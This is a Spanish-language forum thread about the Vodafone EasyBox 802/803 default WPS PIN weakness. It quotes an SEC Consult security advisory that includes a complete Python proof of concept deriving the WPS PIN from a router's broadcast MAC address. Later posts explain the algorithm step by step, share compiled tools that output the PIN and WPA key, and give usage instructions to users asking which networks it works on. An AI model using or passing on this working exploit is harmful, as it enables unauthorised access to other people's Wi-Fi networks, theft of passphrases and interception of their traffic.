* Bing COVID Widget

Board Stats

  • stats Total de Usuarios: 23881
  • stats Total de Mensajes: 105977
  • stats Total de Temas: 9997
  • stats Total de Categorías: 15
  • stats Total de Foros: 74
  • stats Máx. usuarios conectados (simultáneamente): 1945

Ultimo registro


Autor Tema: Metodo para EasyBox de vodafone  (Leído 62402 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado SkyWatcher

  • Moderador
  • Usuario
  • *****
  • Mensajes: 1272
Metodo para EasyBox de vodafone
« en: Enero 06, 2014, 14:08:40 pm »
¿Alguien que controle de phyton? este script genera el pin por defecto basandose en la mac y numero de serie de estos router:

https://lh3.googleusercontent.com/-B1-LVidJnfE/TW0Vk8D2ojI/AAAAAAAAAD4/xRy5wa-lpPM/s1600/Vodafone_EasyBox_802.jpg
Metodo para EasyBox de vodafone


SEC Consult Vulnerability Lab Security Advisory < 20130805-0 >
=======================================================================

title: Vodafone EasyBox Default WPS PIN Algorithm Weakness
product: EasyBox 802 & EasyBox 803
vulnerable version: EasyBox 802 - all versions
EasyBox 803 - Production date before August 2011
fixed version: EasyBox 802 - no vendor patch available
EasyBox 803 - Production date after August 2011
impact: Critical
homepage:
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

found: 2012-12-01
by: Stefan Viehböck
SEC Consult Vulnerability Lab
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

=======================================================================

Vendor/product description:
-----------------------------
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are
rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be
accessed with the default WPS PIN (PIN External Registrar) printed on the back
of the device.


Vulnerability overview/description:
-----------------------------------
The algorithm that generates the default WPS-PIN is entirely based on the MAC
address (=BSSID) and serial number of the device. The serial number can be
derived from the MAC address.

An unauthenticated attacker within the range of the access point can capture
the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN
for it. This PIN can then be used to retrieve the current access point
configuration (including the WPA passphrase) or to change the configuration
(SSID, encryption method, passphrase, ...) of the access point.

An attacker can afterwards connect to the access point and perform malicious
activities such as Man-in-the-middle attacks using ARP spoofing, attack clients
on the internal network, etc.


Proof of concept:
-----------------
A script that implements the derivation algorithm has been developed:

Código: [Seleccionar]
#!/usr/bin/env python
import sys, re

def gen_pin (mac_str, sn):
    mac_int = [int(x, 16) for x in mac_str]
    sn_int = [0]*5+[int(x) for x in sn[5:]]
    hpin = [0] * 7
   
    k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
    k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
    hpin[0] = k1 ^ sn_int[9];
    hpin[1] = k1 ^ sn_int[8];
    hpin[2] = k2 ^ mac_int[9];
    hpin[3] = k2 ^ mac_int[10];
    hpin[4] = mac_int[10] ^ sn_int[9];
    hpin[5] = mac_int[11] ^ sn_int[8];
    hpin[6] = k1 ^ sn_int[7];
    pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000

    # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
# http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc   
    accum = 0
    t = pin
    while (t):
        accum += 3 * (t % 10)
        t /= 10
        accum += t % 10
        t /= 10
    return '%i%i' % (pin, (10 - accum % 10) % 10)

def main():
    if len(sys.argv) != 2:
        sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')
       
    mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
    if len(mac_str) != 12:
        sys.exit('check MAC format!\n')
       
    sn = 'R----%05i' % int(mac_str[8:12], 16)
    print 'derived serial number:', sn
    print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])       
    print 'WPS pin:', gen_pin(mac_str, sn)

if __name__ == "__main__":
    main()


Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,
both produced by Arcadyan/Astoria Networks. Other devices of this vendor
(including EasyBox 903) might be affected as well. Vodafone did not provide
any information on this.

According to Vodafone / CERT-Bund, the following devices are vulnerable:
EasyBox 802 - all versions
EasyBox 803 - production date before August 2011

---------------------------------------------------------------------------------------------------------------

Seria interesante saber como hace el calculo el script exactamente, asi se puede probar con otros modelos.. Yo de phyton 0 patatero..
« Última modificación: Enero 06, 2014, 20:11:15 pm por SkyWatcher »
NO DOY SOPORTE POR MENSAJES PRIVADOS, SI TIENES CUALQUIER DUDA, POSTEA EN EL HILO CORRESPONDIENTE!!

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23417
  • Mari
    • WirelessWindows
Re:Metodo para EasyBox de vodafone
« Respuesta #1 en: Enero 06, 2014, 19:22:42 pm »

Ya que recibí los mios por adelantado justo es que tu recibas los tuyos, así que estos son tus reyes..


http://i7.minus.com/jwkhD5BJMn9Gr.jpg
Metodo para EasyBox de vodafone



Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.



pd. He modificado el tema para meter poner el código dentro de la etiqueta correspondiente que es:    #

pd. modifico el enlace por el de la cuenta del foro para no perder la descarga.

« Última modificación: Noviembre 21, 2018, 18:42:51 pm por maripuri »
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado SkyWatcher

  • Moderador
  • Usuario
  • *****
  • Mensajes: 1272
Re:Metodo para EasyBox de vodafone
« Respuesta #2 en: Enero 06, 2014, 19:53:54 pm »

Ya que recibí los mios por adelantado justo es que tu recibas los tuyos, así que estos son tus reyes..

 ;D ;D ;D ;D ;D

Muchas gracias maquineta!

¿Pero se sabe algo de este metodo? ¿esta estudiado ya?
NO DOY SOPORTE POR MENSAJES PRIVADOS, SI TIENES CUALQUIER DUDA, POSTEA EN EL HILO CORRESPONDIENTE!!

Desconectado chicho_22

  • Usuario
  • *
  • Mensajes: 156
  • haz lo que debas
Re:Metodo para EasyBox de vodafone
« Respuesta #3 en: Enero 06, 2014, 19:59:37 pm »
como se utiliza ? gracias

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23417
  • Mari
    • WirelessWindows
Re:Metodo para EasyBox de vodafone
« Respuesta #4 en: Enero 06, 2014, 20:08:35 pm »


Cita de: SkyWatcher
¿Pero se sabe algo de este metodo? ¿esta estudiado ya?
Se lo que ves en la noticia..  ya la conocía.


Cita de: chicho_22
como se utiliza ? gracias
Con solo mirar la foto lo ves..

argumento

Código: [Seleccionar]
easyboxPIN BSSID
ejemplo

Código: [Seleccionar]
easyboxPIN 00:00:00:00:00:00
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

kcdtv

  • Visitante
Re:Metodo para EasyBox de vodafone
« Respuesta #5 en: Enero 06, 2014, 23:53:06 pm »
respecto al método empleado por Stefan Viehböck ( el quien desvelo el fallo WPS ) grosso modo
,

primero

se deduce parte del serial y el essid gracias al bssid

  - el serial se hace con los dos últimos octetos del bssid pasado a decimal
  - el essid por defecto se hace con los pares 4 y 5 dela mac y acabado pour un par mas de digitos  echos con el primero y ultimo dígito del serial
  No es necesario hacer el paso del essid para obtener el PIN por defecto
 
dejo un ejemplo para que sea mas claro  ;)

para una mac 00:11:22:33::4455

tendríamos

 - serial 17493
los dos últimos dígitos de la mac son 55
pasamos a decimal = 17493.
Aquí guardaremos el primer y ultimo dígito de este serial para calcular el essid por defecto

- Essid por defecto 334413

los pares 4 y 5 de la mac 33 y 44
Y para cabar el primero y ultimo digito del serial  1 y 3

segundo
   
se crean dos llaves, k1 y k2 con partes del bssid y el serial
se usaran luego para crear los digitos del PIN combinados con digitos del bssid y serial ( operandor Xor )

nuestro serial y nuestro bssid nos dan una mesa de caracteres

posicion           | 1 2 3 4 5 6 7 8 9
mac                   | 0 0 1 1 2 2 3 3 4 4 5 5
                           |
serial  (sn)         | 1 7 4 9 3



    k1 = (sn[2] + sn[3] + mac[11] + mac[12]) % 16

    k2 = (sn[4] + sn[5] + mac[9] + mac[10]) % 16

esto son las formulas de tus dos laves intermedias k1 y k2

para crear k1 cogemos   7 y 4 del serial ( posicion 2 y 3 ) |  5 y 5 de la mac ( posicion 11 y 12 ) : 7+4+5+5

para crear k2 seria                          9+3+4+4

una vez que tenemos nuestros digitos los acumulamos en un nipple que pasamos de a base hexa decimal
- edit; hubo un error y es bien pasar de decimal a hexadecimal y no el contrario

Citar
    k1 = (sn[2] + sn[3] + mac[10] + mac[11]) % 16 = (7+4+5+5)%16 = 5

    k2 = (sn[4] + sn[5] + mac[8] + mac[9]) % 16 = (9+3+4+4)%16 = 4


Tercero

obtenemos nuestros digitos de PIN WPS ( hpin en el codigo ) combinando nuestras llaves con dígitos de la mac y del serial mediante operador del XoR
" ^ " en el código 

Código: [Seleccionar]
hpin[0] = k1 ^ sn_int[5];
  hpin[1] = k1 ^ sn_int[4];
  hpin[2] = k2 ^ mac_int[9];
  hpin[3] = k2 ^ mac_int[10];
  hpin[4] = mac_int[11] ^ sn_int[5];
  hpin[5] = mac_int[12] ^ sn_int[4];
  hpin[6] = k1 ^ sn_int[3];

lo que en nuestro ejemplo da

Citar
$ ./pin_wps.py 001122334455   
derived serial number: R----17493
SSID: Arcor|EasyBox|Vodafone-334413
WPS pin: 32520330

« Última modificación: Enero 07, 2014, 00:30:38 am por kcdtv »

Desconectado Coeman76

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 1708
  • Wifiiu fiuuuu!!!
Re:Metodo para EasyBox de vodafone
« Respuesta #6 en: Enero 07, 2014, 00:06:18 am »
Qué bueno kc!! muy bien explicado

;)

NO ATIENDO M.P. PIDIENDO ATENCION PERSONALIZADA... SI TIENES UNA DUDA PREGUNTALA EN EL FORO.

kcdtv

  • Visitante
Re:Metodo para EasyBox de vodafone
« Respuesta #7 en: Enero 07, 2014, 00:41:29 am »
upssss.... acabo de ver que había cometido un error en el segundo paso

para calcular las k1 y K2 dije que se sumaban los dígitos extraídos un nipple y se pasaba a decimal...
Pues quería decir a hexadecimal  :P

recuerdo el ejemplo
 
Código: [Seleccionar]
k1 = (sn[2] + sn[3] + mac[11] + mac[12]) % 16 = (7+4+5+5)%16 = 5

%16
siendo la base 16 (hexadecimal) 

aquí con nuestro ejemplo son 7+4+4+5 = 21 
como la suma se acumula en un nipple se vuelve a 0 el contador cuando hemos llegado a 16 que es la tabla hexadecimal completa 21-16 = 5
y tenemos k1 = 5

y k2

   
Código: [Seleccionar]
k2 = (sn[4] + sn[5] + mac[8] + mac[9]) % 16 = (9+3+4+4)%16 = 4o sea 9+3+4+4 = 20 en un nipple pasado a hexadecimal
   20 - 16 ( la tabla entera ) = 4
y tenemos k2 = 4

« Última modificación: Enero 07, 2014, 00:43:39 am por kcdtv »

Desconectado atim

  • Usuario
  • *
  • Mensajes: 372
Re:Metodo para EasyBox de vodafone
« Respuesta #8 en: Enero 07, 2014, 00:49:02 am »
Gracias por el programa maripuri y muy buena la explicación del algoritmo  kcdtv.
Se sabe para que mac es compatible y si es para vodafone o Vodafone?
Alguien ha podido probarlo en alguna de estas redes?

Un saludo.
« Última modificación: Enero 07, 2014, 00:50:54 am por atim »

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23417
  • Mari
    • WirelessWindows
Re:Metodo para EasyBox de vodafone
« Respuesta #9 en: Enero 07, 2014, 01:29:47 am »
Citar
Se sabe para que mac es compatible y si es para vodafone o Vodafone?
En el fuente se ve una 38:22:9D ahora..  igualmelnte tanto en la imagen como en el fuente se ve V mayúscula.

Código: [Seleccionar]
print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])
No recuerdo si son estas u otras, ya hablaré con kcdtv o alguien del grupo para que me refresque la memoria, pero sino recuerdo mal había compilado una herramienta para la default key
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado oscarelguapo2

  • Usuario
  • *
  • Mensajes: 260
  • el que persevera alcanza
Re:Metodo para EasyBox de vodafone
« Respuesta #10 en: Enero 07, 2014, 07:36:54 am »
maripuri me podrias decir como hace funcionar la aplicacion grasias.................

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23417
  • Mari
    • WirelessWindows
Re:Metodo para EasyBox de vodafone
« Respuesta #11 en: Enero 07, 2014, 11:00:31 am »
Cita de: oscarelguapo2
maripuri me podrias decir como hace funcionar la aplicacion grasias
???   ???

Lee la respuesta 4
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado SkyWatcher

  • Moderador
  • Usuario
  • *****
  • Mensajes: 1272
Re:Metodo para EasyBox de vodafone
« Respuesta #12 en: Enero 07, 2014, 11:49:43 am »
respecto al método empleado por Stefan Viehböck ( el quien desvelo el fallo WPS ) grosso modo

¿Hay algo que no sepas? ¿sabrias decirme los numeros de la euromillones de esta noche?  ;D ;D ;D

Gracias por la explicacion maquinon!!
NO DOY SOPORTE POR MENSAJES PRIVADOS, SI TIENES CUALQUIER DUDA, POSTEA EN EL HILO CORRESPONDIENTE!!

kcdtv

  • Visitante
Re:Metodo para EasyBox de vodafone
« Respuesta #13 en: Enero 07, 2014, 13:13:12 pm »
No se nada  :D ...
Para entender esto he tenido que pedir ayuda al maestro Spawn y pasar un buen tiempo leyendo y rehaciendo a mano los pasos....  ;)
Python y mathes....  :P

  el euromilliones te lo digo ahora;
    el numero es .... mierda, se me va la conexión .........

Desconectado SkyWatcher

  • Moderador
  • Usuario
  • *****
  • Mensajes: 1272
Re:Metodo para EasyBox de vodafone
« Respuesta #14 en: Enero 07, 2014, 21:24:17 pm »
No se nada  :D ...
Para entender esto he tenido que pedir ayuda al maestro Spawn y pasar un buen tiempo leyendo y rehaciendo a mano los pasos....  ;)
Python y mathes....  :P

En cualquier caso siempre ofreces informacion valida y es de agradecer.

el euromilliones te lo digo ahora;
    el numero es .... mierda, se me va la conexión .........

 ;D ;D ;D
NO DOY SOPORTE POR MENSAJES PRIVADOS, SI TIENES CUALQUIER DUDA, POSTEA EN EL HILO CORRESPONDIENTE!!

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23417
  • Mari
    • WirelessWindows
Re:Metodo para EasyBox de vodafone
« Respuesta #15 en: Enero 07, 2014, 21:44:16 pm »

http://img99.xooimage.com/files/b/d/d/sshot-2014-01-07--01-08-15--432aba9.jpg
Metodo para EasyBox de vodafone



Uso:

abrir cónsola CMD y escribir easybox  /  ENTER
escribir la MAC del router tal que el ejemplo: 00:00:00:00:00:00  /  ENTER

Nos devolverá el resultado por pantalla y creará un fichero llamdo clave.txt con la contraseña

Donwload

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


« Última modificación: Diciembre 25, 2014, 17:27:35 pm por maripuri »
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado tiotato8

  • Usuario
  • *
  • Mensajes: 102
Re:Metodo para EasyBox de vodafone
« Respuesta #16 en: Enero 08, 2014, 12:34:22 pm »
para que macs es compatible?

Desconectado pinty_102

  • Moderador Global
  • Usuario
  • *****
  • Mensajes: 1217
Re:Metodo para EasyBox de vodafone
« Respuesta #17 en: Enero 08, 2014, 15:36:15 pm »
lo acabo de probar en linux (wine)y este fue el resultado

http://fotos.motxila.info/coppermine/albums/userpics/10001/sshot-1~0.png
Metodo para EasyBox de vodafone


lo inicie y se me cerro la consola de cmd al ejecutarlo pero me genero un archivo de texto con la key  ;)

salu2
que peligro tener razon en un pais sin justica!!

Desconectado carrasco30

  • Usuario
  • *
  • Mensajes: 233
Re:Metodo para EasyBox de vodafone
« Respuesta #18 en: Enero 08, 2014, 16:38:48 pm »
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


a mi ma hecho lo mismo con una E4:C1:46

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23417
  • Mari
    • WirelessWindows
Re:Metodo para EasyBox de vodafone
« Respuesta #19 en: Enero 08, 2014, 18:05:31 pm »
En linux bajo wine aún no lo probé pinty (coñe, ya era hora de verte piriki) pero al menos en Window NO se cerrará la ventana si se hace tal y como expliqué unas respuesta atrás.

En cualquier caso ya se por donde vas con lo del archivo txt    ;D
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado JDFHN

  • Usuario
  • *
  • Mensajes: 25
Re:Metodo para EasyBox de vodafone
« Respuesta #20 en: Enero 10, 2014, 22:19:39 pm »
Hola, no entiendo muy bien cuales serían las macs soportadas, o si sería para  las SSID EasyBox-xxxxxx o Vodafone-xxxxxx. Lo digo porque no veo ninguna de estas y no me entero. ;D.Gracias.

Desconectado mandovel

  • Usuario
  • *
  • Mensajes: 31
Re:Metodo para EasyBox de vodafone
« Respuesta #21 en: Enero 10, 2014, 23:18:05 pm »
y ami no me da la clave en txt solo un pin y en cdm

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23417
  • Mari
    • WirelessWindows
Re:Metodo para EasyBox de vodafone
« Respuesta #22 en: Enero 10, 2014, 23:24:12 pm »
Citar
y ami no me da la clave en txt solo un pin y en cdm
¿tan poco te has parado a leer que no has visto que hay dos aplicaciones..?  una para PIN y otra para KEY    ::)
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado atim

  • Usuario
  • *
  • Mensajes: 372
Re:Metodo para EasyBox de vodafone
« Respuesta #23 en: Enero 10, 2014, 23:47:25 pm »
Segun se ve la clave que ofrece el programa es de 9 caracteres  ??? . Se sabe si hay Vodafone con este tipo de clave, lo digo porque yo todas las que he visto (y son unas cuantas) tienen 14 caracteres. 

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23417
  • Mari
    • WirelessWindows
Re:Metodo para EasyBox de vodafone
« Respuesta #24 en: Enero 11, 2014, 00:00:37 am »
Es para router's Arcadyan/Astoria Networks en Alemania, no conozco routers de Vodafone / España con 9 caracteres..
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.